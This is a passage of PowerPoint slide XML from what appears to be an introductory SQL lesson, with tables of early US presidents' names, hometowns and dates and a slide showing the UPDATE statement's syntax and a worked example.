                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-16-1751</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1809</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1713610808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>James</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Monroe Hall, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-28-1758</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1817</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2522575697"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Benjamin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6">
                              <a:lumMod val="75000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Franklin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>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2426364152"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44281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Structured Query Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1569660"/>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UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>col1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>val1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>col2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>val2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>criteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>presidents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hometown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Boston, MA”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Franklin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5E34EB-6DD1-4512-8B24-70C6A6D6BB37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353801348"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1313487" y="3423377"/>
          <a:ext cx="9589088" cy="2595880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{D7AC3CCA-C797-4891-BE02-D94E43425B78}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1136301">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3552698260"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1481360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1168334998"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1556201">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="164526466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2218864">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="95918760"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1457510397"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1598181">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3623328670"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>num</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>firstname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>lastname</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>hometown</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>birthday</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>hiredate</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="BE5812"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2394002928"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>George</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Washington</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Popes Creek, VA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FEB-22-1732</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>APR-30-1789</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1677156271"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>John</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Adams</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Braintree, MA</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>OCT-30-1735</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>MAR-4-1797</a:t>
